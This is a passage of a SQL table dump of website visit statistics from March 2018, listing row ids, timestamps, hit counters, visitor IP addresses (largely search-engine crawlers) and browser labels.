36.148.218','other'),(218858,1520775587,1,1,0,0,'54.36.148.208','other'),(218859,1520775596,1,1,0,0,'54.36.149.13','other'),(218860,1520776147,1,1,0,0,'178.154.171.88','other'),(218861,1520776711,1,1,0,0,'54.36.149.30','other'),(218862,1520776810,1,1,0,0,'54.36.148.42','other'),(218863,1520777147,2,0,2,0,'66.249.66.157',''),(218864,1520777165,2,0,2,0,'66.249.66.158',''),(218865,1520777220,1,1,0,0,'87.250.224.46','other'),(218866,1520777282,5,0,5,0,'66.249.66.156',''),(218867,1520777329,1,1,0,0,'141.8.142.74','other'),(218868,1520777535,1,1,0,0,'178.154.171.88','other'),(218869,1520777687,1,1,0,0,'54.36.148.147','other'),(218870,1520777689,1,1,0,0,'54.36.148.114','other'),(218871,1520777788,1,1,0,0,'54.36.149.3','other'),(218872,1520777942,1,1,0,0,'40.77.167.0','other'),(218873,1520778099,1,1,0,0,'54.36.148.113','other'),(218874,1520778824,1,0,1,0,'66.249.66.201',''),(218875,1520778829,1,0,1,0,'66.249.66.158',''),(218876,1520778835,4,0,4,0,'66.249.66.157',''),(218877,1520778867,1,1,0,0,'54.36.148.72','other'),(218878,1520778899,5,0,5,0,'66.249.66.156',''),(218879,1520779138,1,1,0,0,'54.36.148.63','other'),(218880,1520779304,1,1,0,0,'178.154.171.88','other'),(218881,1520779631,2,2,0,0,'94.179.247.52','chrome'),(218882,1520780208,1,1,0,0,'207.244.149.26','chrome'),(218883,1520780628,1,1,0,0,'54.36.148.41','other'),(218884,1520780898,1,1,0,0,'66.249.66.201','chrome'),(218885,1520780904,1,1,0,0,'66.249.66.156','chrome'),(218886,1520781013,1,1,0,0,'54.36.148.106','other'),(218887,1520781318,1,1,0,0,'178.154.171.88','other'),(218888,1520781983,1,1,0,0,'8.29.198.27','other'),(218889,1520782014,1,1,0,0,'54.36.148.69','other'),(218890,1520782480,1,0,1,0,'66.249.66.158',''),(218891,1520782492,2,0,2,0,'66.249.66.156',''),(218892,1520782494,1,1,0,0,'54.36.148.173','other'),(218893,1520782497,1,1,0,0,'54.36.148.21','other'),(218894,1520782544,1,1,0,0,'54.36.148.11','other'),(218895,1520782551,1,1,0,0,'141.8.142.74','other'),(218896,1520782679,1,0,1,0,'66.249.66.201',''),(218897,1520783265,1,1,0,0,'54.36.149.85','other'),(218898,1520783297,1,1,0,0,'217.69.133.222','other'),(218899,1520783716,1,1,0,0,'54.36.148.93','other'),(218900,1520783718,1,0,1,0,'66.249.66.201',''),(218901,1520783873,1,1,0,0,'217.69.136.207','other'),(218902,1520783883,1,1,0,0,'54.36.149.39','other'),(218903,1520784127,1,0,1,0,'66.249.66.195',''),(218904,1520784507,1,1,0,0,'54.36.149.17','other'),(218905,1520784625,1,0,1,0,'66.249.66.158',''),(218906,1520784654,1,0,1,0,'66.249.66.156',''),(218907,1520784708,1,1,0,0,'54.36.148.71','other'),(218908,1520784899,1,1,0,0,'178.154.171.88','other'),(218909,1520785114,1,1,0,0,'54.36.148.208','other'),(218910,1520785338,1,1,0,0,'54.36.148.75','other'),(218911,1520785508,1,1,0,0,'54.36.148.98','other'),(218912,1520785865,1,1,0,0,'54.36.148.209','other'),(218913,1520786163,1,0,1,0,'66.249.66.199',''),(218914,1520786248,2,0,2,0,'66.249.66.156',''),(218915,1520786324,1,0,1,0,'66.249.66.158',''),(218916,1520786348,1,1,0,0,'66.249.66.195','chrome'),(218917,1520786641,1,1,0,0,'180.76.15.136','other'),(218918,1520786686,1,1,0,0,'178.154.171.88','other'),(218919,1520786721,1,1,0,0,'54.36.149.35','other'),(218920,1520787898,2,2,0,0,'141.8.142.74','other'),(218921,1520788024,1,1,0,0,'54.36.148.11','other'),(218922,1520788105,1,1,0,0,'217.69.133.226','other'),(218923,1520788414,1,1,0,0,'54.36.148.130','other'),(218924,1520789319,1,1,0,0,'54.36.148.178','other'),(218925,1520789482,1,1,0,0,'54.36.148.96','other'),(218926,1520789484,1,1,0,0,'54.36.149.46','other'),(218927,1520790111,1,1,0,0,'54.36.148.92','other'),(218928,1520790641,1,1,0,0,'180.76.15.161','other'),(218929,1520790730,1,1,0,0,'54.36.148.72','other'),(218930,1520790894,1,1,0,0,'54.36.148.246','other'),(218931,1520791095,2,0,2,0,'66.249.66.201',''),(218932,1520791905,1,1,0,0,'54.36.148.182','other'),(218933,1520792158,1,1,0,0,'54.36.148.243','other'),(218934,1520792460,2,0,2,0,'66.249.66.199',''),(218935,1520792462,1,1,0,0,'54.36.148.248','other'),(218936,1520792776,1,1,0,0,'54.36.149.1','other'),(218937,1520792834,1,1,0,0,'8.29.198.26','other'),(218938,1520793022,1,1,0,0,'54.36.149.25','other'),(218939,1520793131,1,0,1,0,'66.249.66.195',''),(218940,1520793418,1,0,1,0,'66.249.66.158',''),(218941,1520793493,1,1,0,0,'54.36.148.17','other'),(218942,1520793526,1,1,0,0,'54.36.149.48','other'),(218943,1520793708,1,0,1,0,'66.249.66.157',''),(218944,1520793723,1,1,0,0,'54.36.148.247','other'),(218945,1520794637,1,1,0,0,'54.36.148.159','other'),(218946,1520794682,1,1,0,0,'54.36.148.79','other'),(218947,1520794923,1,1,0,0,'54.36.148.164','other'),(218948,1520794963,1,1,0,0,'54.36.148.169','other'),(218949,1520795360,1,0,1,0,'66.249.66.158',''),(218950,1520796314,1,1,0,0,'54.36.149.20','other'),(218951,1520796363,3,3,0,0,'178.154.171.88','other'),(218952,1520796549,1,1,0,0,'176.8.141.224','chrome'),(218953,1520796594,1,1,0,0,'87.250.224.46','other'),(218954,1520797068,1,1,0,0,'216.244.66.246','other'),(218955,1520797158,1,1,0,0,'66.249.66.157','chrome'),(218956,1520797239,1,0,1,0,'66.249.66.201',''),(218957,1520798392,1,1,0,0,'54.36.149.7','other'),(218958,1520799054,1,0,1,0,'66.249.66.157',''),(218959,1520799101,1,1,0,0,'54.36.149.5','other'),(218960,1520799131,1,1,0,0,'54.36.149.102','other'),(218961,1520799147,1,1,0,0,'66.249.66.195','chrome'),(218962,1520799218,1,1,0,0,'54.36.148.97','other'),(218963,1520800069,1,1,0,0,'217.69.133.233','other'),(218964,1520800254,1,1,0,0,'54.36.148.248','other'),(218965,1520800255,1,1,0,0,'217.69.143.217','firefox'),(218966,1520800315,1,1,0,0,'54.36.148.152','other'),(218967,1520800446,1,1,0,0,'54.36.149.38','other'),(218968,1520800817,1,0,1,0,'66.249.66.158',''),(218969,1520800870,1,1,0,0,'216.244.66.237','other'),(218970,1520801219,1,0,1,0,'66.249.66.201',''),(218971,1520801471,1,1,0,0,'46.242.27.120','msie'),(218972,1520801473,1,1,0,0,'46.251.71.113','msie'),(218973,1520801631,1,1,0,0,'54.36.148.193','other'),(218974,1520801999,1,0,1,0,'66.249.66.158',''),(218975,1520802043,1,1,0,0,'54.36.149.70','other'),(218976,1520802057,1,0,1,0,'66.249.66.199',''),(218977,1520802671,1,1,0,0,'217.69.133.238','other'),(218978,1520802679,1,1,0,0,'54.36.148.174','other'),(218979,1520802854,1,1,0,0,'54.36.148.144','other'),(218980,1520802925,1,1,0,0,'54.36.149.107','other'),(218981,1520803382,1,1,0,0,'54.36.148.69','other'),(218982,1520803398,1,1,0,0,'178.154.171.81','other'),(218983,1520803407,1,1,0,0,'54.36.148.135','other'),(218984,1520803545,1,1,0,0,'178.154.171.88','other'),(218985,1520803672,1,1,0,0,'8.29.198.25','other'),(218986,1520803964,1,0,1,0,'66.249.66.156',''),(218987,1520804021,1,1,0,0,'54.36.149.73','other'),(218988,1520804306,1,1,0,0,'54.36.148.205','other'),(218989,1520806193,1,1,0,0,'216.244.66.237','other'),(218990,1520806299,1,1,0,0,'54.36.148.244','other'),(218991,1520806457,1,1,0,0,'54.36.148.202','other'),(218992,1520806726,1,1,0,0,'216.244.66.194','other'),(218993,1520806929,1,1,0,0,'54.36.148.231','other'),(218994,1520807341,1,1,0,0,'54.36.149.91','other'),(218995,1520807342,1,1,0,0,'54.36.148.131','other'),(218996,1520807437,1,1,0,0,'54.36.148.176','other'),(218997,1520807977,1,1,0,0,'87.250.224.46','other'),(218998,1520807979,1,0,1,0,'66.249.66.158',''),(218999,1520808113,1,0,1,0,'66.249.66.201',''),(219000,1520808859,1,1,0,0,'5.228.130.82','chrome'),(219001,1520808893,1,1,0,0,'54.36.149.92','other'),(219002,1520809159,1,1,0,0,'54.36.148.111','other'),(219003,1520809200,1,1,0,0,'37.9.113.115','other'),(219004,1520809327,1,1,0,0,'54.36.148.240','other'),(219005,1520809539,1,1,0,0,'54.36.149.85','other'),(219006,1520809815,1,1,0,0,'141.8.142.74','other'),(219007,1520809917,1,1,0,0,'141.8.132.19','other'),(219008,1520810043,1,0,1,0,'66.249.66.157',''),(219009,1520810090,1,0,1,0,'66.249.66.156',''),(219010,1520810620,1,0,1,0,'66.249.66.201',''),(219011,1520810830,1,1,0,0,'54.36.148.178','other'),(219012,1520810868,1,1,0,0,'54.36.149.74','other'),(219013,1520811088,1,1,0,0,'54.36.148.149','other'),(219014,1520811131,1,1,0,0,'54.36.148.77','other'),(219015,1520811175,1,1,0,0,'54.36.148.16','other'),(219016,1520811330,1,1,0,0,'54.36.148.24','other'),(219017,1520811518,1,1,0,0,'54.36.148.171','other'),(219018,1520811786,1,1,0,0,'54.36.149.86','other'),(219019,1520811814,1,1,0,0,'217.69.133.29','other'),(219020,1520812244,1,1,0,0,'54.36.148.146','other'),(219021,1520812788,1,1,0,0,'54.36.149.50','other'),(219022,1520813152,1,1,0,0,'141.8.142.74','other'),(219023,1520813209,1,1,0,0,'54.165.59.7','other'),(219024,1520813322,1,1,0,0,'54.36.148.86','other'),(219025,1520813618,1,1,0,0,'178.154.171.88','other'),(219026,1520813690,1,1,0,0,'52.87.153.3','other'),(219027,1520814323,1,1,0,0,'216.244.66.237','other'),(219028,1520814507,1,1,0,0,'8.29.198.25','other'),(219029,1520815065,2,2,0,0,'141.8.142.74','other'),(219030,1520815791,1,1,0,0,'54.36.149.41','other'),(219031,1520816096,1,1,0,0,'54.36.148.146','other'),(219032,1520816606,1,0,1,0,'66.249.66.158',''),(219033,1520816736,1,1,0,0,'54.36.149.7','other'),(219034,1520817235,1,1,0,0,'54.36.148.120','other'),(219035,1520818354,1,1,0,0,'141.8.132.19','other'),(219036,1520818364,1,1,0,0,'141.8.142.74','other'),(219037,1520818403,1,0,1,0,'66.249.66.201',''),(219038,1520818429,1,1,0,0,'37.9.113.115','other'),(219039,1520818435,1,1,0,0,'54.36.148.138','other'),(219040,1520819029,1,1,0,0,'54.36.148.190','other'),(219041,1520819284,1,1,0,0,'37.9.113.182','other'),(219042,1520819376,1,1,0,0,'54.36.148.165','other'),(219043,1520819629,1,1,0,0,'178.154.171.88','other'),(219044,1520820253,1,0,1,0,'66.249.66.157',''),(219045,1520820730,1,1,0,0,'52.87.153.3','other'),(219046,1520821274,1,1,0,0,'54.36.148.71','other'),(219047,1520821461,1,1,0,0,'141.8.142.74','other'),(219048,1520821905,1,0,1,0,'66.249.66.199',''),(219049,1520822396,1,1,0,0,'178.154.171.88','other'),(219050,1520822615,1,0,1,0,'66.249.66.157',''),(219051,1520822701,1,1,0,0,'54.36.148.24','other'),(219052,1520822711,1,1,0,0,'54.36.148.61','other'),(219053,1520822875,1,1,0,0,'54.36.148.39','other'),(219054,1520823624,1,1,0,0,'54.36.148.108','other'),(219055,1520823683,1,1,0,0,'54.36.148.226','other'),(219056,1520823684,1,1,0,0,'54.36.148.209','other'),(219057,1520824316,1,1,0,0,'54.36.148.225','other'),(219058,1520824336,1,1,0,0,'54.36.149.18','other'),(219059,1520824372,1,1,0,0,'66.249.66.157','chrome'),(219060,1520824787,1,1,0,0,'54.67.59.131','chrome'),(219061,1520825350,1,1,0,0,'8.29.198.27','other'),(219062,1520827555,1,1,0,0,'5.9.156.43','other'),(219063,1520827583,2,2,0,0,'141.8.142.74','other'),(219064,1520827684,1,1,0,0,'54.36.148.76','other'),(219065,1520827701,1,1,0,0,'54.36.148.201','other'),(219066,1520827872,1,1,0,0,'66.249.66.201','chrome'),(219067,1520828037,1,1,0,0,'54.36.149.45','other'),(219068,1520828542,1,1,0,0,'217.69.136.206','other'),(219069,1520828546,1,1,0,0,'54.36.149.25','other'),(219070,1520828718,1,0,1,0,'66.249.66.199',''),(219071,1520828822,1,0,1,0,'66.249.66.201',''),(219072,1520829052,1,1,0,0,'54.36.148.215','other'),(219073,1520829135,1,1,0,0,'54.36.148.66','other'),(219074,1520829745,1,1,0,0,'157.55.39.170','other'),(219075,1520829872,14,14,0,0,'213.133.111.165','other'),(219076,1520829883,1,1,0,0,'141.8.132.19','other'),(219077,1520830242,1,1,0,0,'178.154.171.88','other'),(219078,1520830465,1,1,0,0,'54.36.149.95','other'),(219079,1520830752,1,1,0,0,'54.36.148.117','other'),(219080,1520830782,2,2,0,0,'141.8.142.74','other'),(219081,1520830863,1,1,0,0,'54.36.148.12','other'),(219082,1520831458,1,0,1,0,'66.249.66.199',''),(219083,1520831891,1,1,0,0,'54.36.148.73','other'),(219084,1520832235,1,1,0,0,'37.73.196.101','chrome'),(219085,1520832326,1,1,0,0,'141.8.142.74','other'),(219086,1520832848,1,0,1,0,'66.249.66.195',''),(219087,1520833270,1,1,0,0,'46.161.9.39','firefox'),(219088,1520834034,1,1,0,0,'54.36.148.35','other'),(219089,1520834072,1,1,0,0,'107.178.33.19','chrome'),(219090,1520834221,2,2,0,0,'141.8.142.74','other'),(219091,1520834320,1,1,0,0,'217.69.133.223','other'),(219092,1520834462,1,1,0,0,'217.69.136.209','other'),(219093,1520834730,1,1,0,0,'54.36.148.13','other'),(219094,1520834960,1,1,0,0,'217.69.136.204','other'),(219095,1520835070,1,1,0,0,'77.111.244.18','chrome'),(219096,1520835071,1,1,0,0,'178.154.171.88','other'),(219097,1520835167,1,1,0,0,'91.196.177.46','chrome'),(219098,1520835296,1,1,0,0,'54.36.149.5','other'),(219099,1520836071,1,1,0,0,'54.36.148.35','other'),(219100,1520836108,1,1,0,0,'217.69.133.227','other'),(219101,1520836191,1,1,0,0,'8.29.198.26','other'),(219102,1520836437,1,1,0,0,'54.36.149.104','other'),(219103,1520836753,2,2,0,0,'141.8.142.74','other'),(219104,1520836881,1,1,0,0,'37.9.113.182','other'),(219105,1520836921,2,2,0,0,'178.154.171.88','other'),(219106,1520837058,1,0,1,0,'66.249.66.195',''),(219107,1520837108,1,1,0,0,'54.36.148.110','other'),(219108,1520837341,1,1,0,0,'54.36.148.128','other'),(219109,1520837396,2,2,0,0,'195.230.119.34','chrome'),(219110,1520837635,1,0,1,0,'66.249.66.199',''),(219111,1520838046,1,1,0,0,'54.36.148.132','other'),(219112,1520838377,1,0,1,0,'66.249.66.195',''),(219113,1520838609,1,1,0,0,'141.8.142.74','other'),(219114,1520838797,1,1,0,0,'217.69.133.235','other'),(219115,1520838832,1,1,0,0,'37.55.56.67','chrome'),(219116,1520839486,1,0,1,0,'66.249.66.199',''),(219117,1520839823,2,2,0,0,'37.55.227.180','chrome'),(219118,1520839932,2,2,0,0,'91.196.178.45','chrome'),(219119,1520840190,1,1,0,0,'87.250.224.46','other'),(219120,1520840647,3,3,0,0,'91.196.178.93','chrome'),(219121,1520841045,1,1,0,0,'37.55.227.180','chrome'),(219122,1520841577,1,1,0,0,'5.3.169.33','chrome'),(219123,1520841585,1,1,0,0,'54.36.148.225','other'),(219124,1520841905,1,1,0,0,'217.69.133.249','other'),(219125,1520841984,1,1,0,0,'54.36.149.27','other'),(219126,1520841988,1,1,0,0,'94.178.116.64','chrome'),(219127,1520842395,1,1,0,0,'217.69.133.67','other'),(219128,1520842561,1,1,0,0,'91.196.178.169','chrome'),(219129,1520842758,1,1,0,0,'178.154.171.88','other'),(219130,1520842882,1,1,0,0,'46.200.115.124','firefox'),(219131,1520843129,2,2,0,0,'130.180.218.106','chrome'),(219132,1520843399,1,1,0,0,'54.36.149.71','other'),(219133,1520843422,1,1,0,0,'54.36.148.22','other'),(219134,1520843681,1,1,0,0,'194.247.172.15','chrome'),(219135,1520843790,2,2,0,0,'188.163.245.150','chrome'),(219136,1520843925,2,2,0,0,'178.92.74.191','chrome'),(219137,1520844025,1,1,0,0,'54.36.148.13','other'),(219138,1520845096,1,0,1,0,'66.249.75.153',''),(219139,1520845151,1,0,1,0,'66.249.69.145',''),(219140,1520845239,1,1,0,0,'54.36.149.34','other'),(219141,1520845275,1,0,1,0,'66.249.69.144',''),(219142,1520845427,3,3,0,0,'141.8.142.74','other'),(219143,1520846101,1,1,0,0,'91.196.178.93','chrome'),(219144,1520847041,1,1,0,0,'8.29.198.26','other'),(219145,1520847785,1,1,0,0,'91.236.249.70','chrome'),(219146,1520847803,1,1,0,0,'87.250.224.46','other'),(219147,1520848733,1,0,1,0,'66.249.69.143',''),(219148,1520849553,1,1,0,0,'87.250.224.46','other'),(219149,1520849752,2,2,0,0,'130.180.218.106','chrome'),(219150,1520850105,1,1,0,0,'91.196.178.130','chrome'),(219151,1520850161,1,1,0,0,'141.8.142.74','other'),(219152,1520851173,1,1,0,0,'109.86.69.227','firefox'),(219153,1520851229,1,0,1,0,'66.249.75.157',''),(219154,1520851263,2,2,0,0,'141.8.142.74','other'),(219155,1520851614,2,2,0,0,'91.196.178.164','chrome'),(219156,1520851995,2,2,0,0,'178.154.171.88','other'),(219157,1520852474,1,0,1,0,'66.249.69.143',''),(219158,1520852841,1,0,1,0,'66.249.69.145',''),(219159,1520853087,1,1,0,0,'92.112.125.243','chrome'),(219160,1520853350,2,2,0,0,'130.180.218.106','chrome'),(219161,1520853389,3,3,0,0,'91.196.178.27','chrome'),(219162,1520853434,1,1,0,0,'178.154.171.88','other'),(219163,1520853485,1,1,0,0,'141.8.142.74','other'),(219164,1520853615,1,1,0,0,'91.197.19.161','chrome'),(219165,1520853719,1,1,0,0,'180.76.15.161','other'),(219166,1520854507,1,1,0,0,'216.244.66.237','other'),(219167,1520854616,2,2,0,0,'87.250.224.46','other'),(219168,1520854640,1,1,0,0,'141.8.142.74','other'),(219169,1520854822,1,1,0,0,'178.154.171.88','other'),(219170,1520854907,1,1,0,0,'66.249.75.155','chrome'),(219171,1520854924,1,0,1,0,'66.249.69.143',''),(219172,1520854972,1,1,0,0,'52.87.153.3','other'),(219173,1520856356,2,2,0,0,'188.163.17.36','chrome'),(219174,1520856682,1,1,0,0,'141.8.142.74','other'),(219175,1520856698,1,1,0,0,'217.69.133.191','other'),(219176,1520856711,2,2,0,0,'91.196.178.101','chrome'),(219177,1520856762,1,1,0,0,'178.154.171.88','other'),(219178,1520857902,1,1,0,0,'8.29.198.26','other'),(219179,1520857925,1,1,0,0,'178.93.44.74','firefox'),(219180,1520858525,7,7,0,0,'91.196.177.15','chrome'),(219181,1520858543,2,2,0,0,'91.196.178.93','chrome'),(219182,1520858576,1,1,0,0,'77.111.244.63','chrome'),(219183,1520858647,1,1,0,0,'77.111.244.55','chrome'),(219184,1520859538,1,1,0,0,'31.43.31.44','chrome'),(219185,1520859731,2,2,0,0,'91.196.178.93','chrome'),(219186,1520859814,1,1,0,0,'178.154.171.88','other'),(219187,1520859932,1,1,0,0,'87.250.224.46','other'),(219188,1520860000,2,2,0,0,'92.112.35.200','chrome'),(219189,1520860162,2,2,0,0,'91.196.179.134','chrome'),(219190,1520860164,1,0,1,0,'66.249.69.144',''),(219191,1520860407,1,1,0,0,'66.249.69.143','chrome'),(219192,1520860513,1,1,0,0,'95.132.49.255','firefox'),(219193,1520861347,1,0,1,0,'66.249.69.143',''),(219194,1520861714,1,1,0,0,'178.154.171.55','other'),(219195,1520861717,1,1,0,0,'37.9.113.134','other'),(219196,1520861956,1,1,0,0,'5.45.207.49','other'),(219197,1520862493,2,2,0,0,'91.196.178.93','chrome'),(219198,1520862571,1,1,0,0,'217.69.133.253','other'),(219199,1520862575,1,1,0,0,'217.69.133.251','other'),(219200,1520863889,1,1,0,0,'213.180.203.8','other'),(219201,1520864073,1,1,0,0,'82.207.49.138','chrome'),(219202,1520864184,1,1,0,0,'178.154.171.88','other'),(219203,1520864218,1,1,0,0,'31.13.111.87','other'),(219204,1520864280,1,0,1,0,'66.249.69.145',''),(219205,1520864320,1,1,0,0,'91.196.178.69','firefox'),(219206,1520864490,1,1,0,0,'37.9.113.182','other'),(219207,1520865337,2,2,0,0,'91.196.178.161','chrome'),(219208,1520865609,1,1,0,0,'130.180.209.5','chrome'),(219209,1520865795,1,0,1,0,'66.249.69.144',''),(219210,1520865812,1,1,0,0,'178.154.171.88','other'),(219211,1520865966,1,1,0,0,'217.69.133.67','other'),(219212,1520866059,1,1,0,0,'91.196.177.46','firefox'),(219213,1520866435,1,1,0,0,'95.134.97.244','chrome'),(219214,1520866552,1,1,0,0,'82.207.49.138','chrome'),(219215,1520866711,1,1,0,0,'92.244.99.158','chrome'),(219216,1520866823,1,1,0,0,'52.87.153.3','other'),(219217,1520866876,1,1,0,0,'78.111.186.166','chrome'),(219218,1520866904,3,3,0,0,'141.8.142.74','other'),(219219,1520866908,3,3,0,0,'178.154.171.88','other'),(219220,1520867016,1,1,0,0,'91.196.178.104','chrome'),(219221,1520867130,1,0,1,0,'66.249.69.143',''),(219222,1520867297,1,1,0,0,'54.36.148.163','other'),(219223,1520867513,1,1,0,0,'54.36.149.19','other'),(219224,1520867896,1,1,0,0,'54.36.149.13','other'),(219225,1520867937,1,1,0,0,'54.36.148.96','other'),(219226,1520867950,1,1,0,0,'178.154.171.88','other'),(219227,1520868004,1,1,0,0,'54.36.148.47','other'),(219228,1520868060,1,1,0,0,'54.36.149.90','other'),(219229,1520868594,1,1,0,0,'54.36.148.152','other'),(219230,1520868749,1,1,0,0,'8.29.198.25','other'),(219231,1520868919,2,2,0,0,'91.196.178.93','chrome'),(219232,1520869001,1,1,0,0,'54.36.148.84','other'),(219233,1520869196,2,2,0,0,'66.249.69.144','chrome'),(219234,1520869264,1,1,0,0,'54.36.148.55','other'),(219235,1520869645,2,2,0,0,'87.250.224.46','other'),(219236,1520869649,1,1,0,0,'141.8.142.74','other'),(219237,1520869681,1,1,0,0,'54.36.148.109','other'),(219238,1520870213,1,1,0,0,'54.36.148.199','other'),(219239,1520870246,1,1,0,0,'54.36.148.246','other'),(219240,1520870310,1,1,0,0,'54.36.149.1','other'),(219241,1520870471,1,1,0,0,'188.230.43.254','other'),(219242,1520870495,1,1,0,0,'54.36.148.251','other'),(219243,1520871126,1,1,0,0,'54.36.149.7','other'),(219244,1520871147,1,1,0,0,'54.36.148.157','other'),(219245,1520871253,1,1,0,0,'54.36.149.20','other'),(219246,1520871323,1,1,0,0,'54.36.148.71','other'),(219247,1520871333,1,1,0,0,'93.180.179.71','chrome'),(219248,1520871418,1,1,0,0,'216.244.66.246','other'),(219249,1520871550,1,0,1,0,'66.249.69.145',''),(219250,1520871754,1,1,0,0,'54.36.149.58','other'),(219251,1520872433,1,0,1,0,'66.249.69.144',''),(219252,1520872753,1,1,0,0,'54.36.148.177','other'),(219253,1520872866,1,1,0,0,'188.230.43.254','other'),(219254,1520873118,1,1,0,0,'54.36.148.179','other'),(219255,1520873559,1,0,1,0,'66.249.69.143',''),(219256,1520874204,1,1,0,0,'54.36.148.33','other'),(219257,1520874633,1,1,0,0,'46.211.126.215','chrome'),(219258,1520875264,1,1,0,0,'188.230.43.254','other'),(219259,1520875658,1,1,0,0,'54.36.148.55','other'),(219260,1520875739,1,1,0,0,'54.36.148.116','other'),(219261,1520875956,1,1,0,0,'66.102.9.40','chrome'),(219262,1520876029,2,2,0,0,'178.154.171.88','other'),(219263,1520876053,1,1,0,0,'87.250.224.46','other'),(219264,1520876063,1,0,1,0,'66.249.69.143',''),(219265,1520876087,1,1,0,0,'54.36.148.218','other'),(219266,1520876172,1,1,0,0,'91.209.11.236','other'),(219267,1520876277,2,2,0,0,'91.196.178.29','chrome'),(219268,1520876301,1,1,0,0,'141.8.142.74','other'),(219269,1520876555,1,1,0,0,'54.36.148.213','other'),(219270,1520877325,2,2,0,0,'141.8.142.74','other'),(219271,1520877419,1,1,0,0,'54.36.149.98','other'),(219272,1520877668,1,1,0,0,'188.230.43.254','other'),(219273,1520878000,1,1,0,0,'54.36.148.225','other'),(219274,1520878606,1,1,0,0,'80.252.155.198','chrome'),(219275,1520879005,2,2,0,0,'92.113.188.43','chrome'),(219276,1520879410,1,1,0,0,'217.69.133.191','other'),(219277,1520879612,1,1,0,0,'8.29.198.25','other'),(219278,1520879726,1,1,0,0,'54.36.148.11','other'),(219279,1520879905,1,1,0,0,'54.36.148.72','other'),(219280,1520880242,1,0,1,0,'66.249.75.157',''),(219281,1520880272,1,1,0,0,'54.36.149.98','other'),(219282,1520880282,1,0,1,0,'66.249.69.143',''),(219283,1520880459,1,1,0,0,'54.36.148.42','other'),(219284,1520881035,1,1,0,0,'54.36.148.61','other'),(219285,1520881503,1,1,0,0,'54.36.148.172','other'),(219286,1520881651,1,1,0,0,'54.36.148.121','other'),(219287,1520882496,1,1,0,0,'54.36.149.92','other'),(219288,1520882623,1,1,0,0,'141.8.142.74','other'),(219289,1520882658,1,1,0,0,'54.36.148.251','other'),(219290,1520882716,1,1,0,0,'195.216.204.9','chrome'),(219291,1520882754,1,1,0,0,'54.36.148.15','other'),(219292,1520883389,1,1,0,0,'54.36.148.130','other'),(219293,1520883909,1,1,0,0,'141.8.142.74','other'),(219294,1520883910,1,1,0,0,'217.69.133.238','other'),(219295,1520883919,1,1,0,0,'54.36.148.125','other'),(219296,1520884365,2,2,0,0,'46.211.98.28','chrome'),(219297,1520884569,1,1,0,0,'52.87.153.3','other'),(219298,1520884700,1,1,0,0,'54.36.148.142','other'),(219299,1520884992,1,1,0,0,'54.36.148.69','other'),(219300,1520885045,1,1,0,0,'54.36.149.57','other'),(219301,1520885161,1,1,0,0,'54.36.148.28','other'),(219302,1520885584,1,1,0,0,'54.36.148.124','other'),(219303,1520885702,1,1,0,0,'54.36.148.172','other'),(219304,1520885778,2,2,0,0,'91.196.178.36','chrome'),(219305,1520886479,1,1,0,0,'54.36.149.48','other'),(219306,1520886530,1,1,0,0,'54.36.149.1','other'),(219307,1520887377,1,1,0,0,'54.36.148.36','other'),(219308,1520887505,1,1,0,0,'212.83.178.172','chrome'),(219309,1520887715,1,1,0,0,'54.36.149.24','other'),(219310,1520887822,1,1,0,0,'54.36.148.54','other'),(219311,1520888272,1,1,0,0,'46.161.9.39','chrome'),(219312,1520888518,1,1,0,0,'54.36.148.186','other'),(219313,1520888693,1,1,0,0,'46.200.228.229','chrome'),(219314,1520889137,1,1,0,0,'54.36.148.167','other'),(219315,1520889307,1,1,0,0,'54.36.148.165','other'),(219316,1520889353,1,1,0,0,'54.36.148.213','other'),(219317,1520889400,1,1,0,0,'54.36.148.207','other'),(219318,1520890194,1,1,0,0,'54.36.148.54','other'),(219319,1520890422,1,1,0,0,'54.36.148.176','other'),(219320,1520890455,1,1,0,0,'8.29.198.26','other'),(219321,1520890516,1,1,0,0,'54.36.149.74','other'),(219322,1520890540,1,0,1,0,'66.249.75.155',''),(219323,1520890555,1,1,0,0,'54.36.148.42','other'),(219324,1520890558,1,1,0,0,'54.36.148.158','other'),(219325,1520890602,1,1,0,0,'91.209.11.236','other'),(219326,1520890650,1,1,0,0,'141.8.142.74','other'),(219327,1520891287,1,1,0,0,'54.36.148.123','other'),(219328,1520891296,1,1,0,0,'54.36.148.129','other'),(219329,1520891797,1,1,0,0,'54.36.148.165','other'),(219330,1520891934,1,1,0,0,'54.36.148.232','other'),(219331,1520892202,1,1,0,0,'54.36.148.18','other'),(219332,1520892635,1,1,0,0,'54.36.148.81','other'),(219333,1520892988,1,0,1,0,'66.249.69.143',''),(219334,1520893087,1,1,0,0,'54.36.148.166','other'),(219335,1520893227,1,1,0,0,'54.36.148.112','other'),(219336,1520893375,1,1,0,0,'54.36.148.10','other'),(219337,1520893821,1,0,1,0,'66.249.66.199',''),(219338,1520893841,1,1,0,0,'54.36.148.34','other'),(219339,1520894273,2,2,0,0,'130.180.218.193','chrome'),(219340,1520894446,1,1,0,0,'54.36.148.118','other'),(219341,1520894515,1,1,0,0,'157.55.39.204','other'),(219342,1520894571,1,1,0,0,'54.36.148.120','other'),(219343,1520894696,2,2,0,0,'87.250.224.46','other'),(219344,1520894711,1,1,0,0,'54.36.148.216','other'),(219345,1520894908,1,1,0,0,'54.36.148.98','other'),(219346,1520894997,1,1,0,0,'54.36.148.127','other'),(219347,1520895177,1,1,0,0,'54.36.148.20','other'),(219348,1520895890,1,1,0,0,'54.36.149.19','other'),(219349,1520896002,1,1,0,0,'54.36.149.91','other'),(219350,1520896281,1,0,1,0,'66.249.66.199',''),(219351,1520896809,1,1,0,0,'178.154.171.88','other'),(219352,1520897093,1,1,0,0,'54.36.149.92','other'),(219353,1520897431,1,1,0,0,'157.55.13.64','other'),(219354,1520897593,1,1,0,0,'217.69.133.222','other'),(219355,1520897599,1,1,0,0,'54.36.148.12','other'),(219356,1520897612,1,1,0,0,'54.36.149.34','other'),(219357,1520897806,1,1,0,0,'54.36.148.101','other'),(219358,1520898345,1,1,0,0,'178.154.171.88','other'),(219359,1520898433,1,1,0,0,'141.8.142.74','other'),(219360,1520898501,1,1,0,0,'54.36.148.22','other'),(219361,1520898527,1,0,1,0,'66.249.66.199',''),(219362,1520898584,1,1,0,0,'54.36.148.31','other'),(219363,1520899296,1,1,0,0,'54.36.149.36','other'),(219364,1520899478,1,1,0,0,'54.36.148.20','other'),(219365,1520899638,1,1,0,0,'54.36.148.186','other'),(219366,1520900058,1,0,1,0,'66.249.66.201',''),(219367,1520900149,1,1,0,0,'54.36.149.1','other'),(219368,1520900198,1,1,0,0,'54.36.149.54','other'),(219369,1520900442,1,1,0,0,'54.36.148.66','other'),(219370,1520900489,1,1,0,0,'54.165.59.7','other'),(219371,1520900568,1,1,0,0,'178.154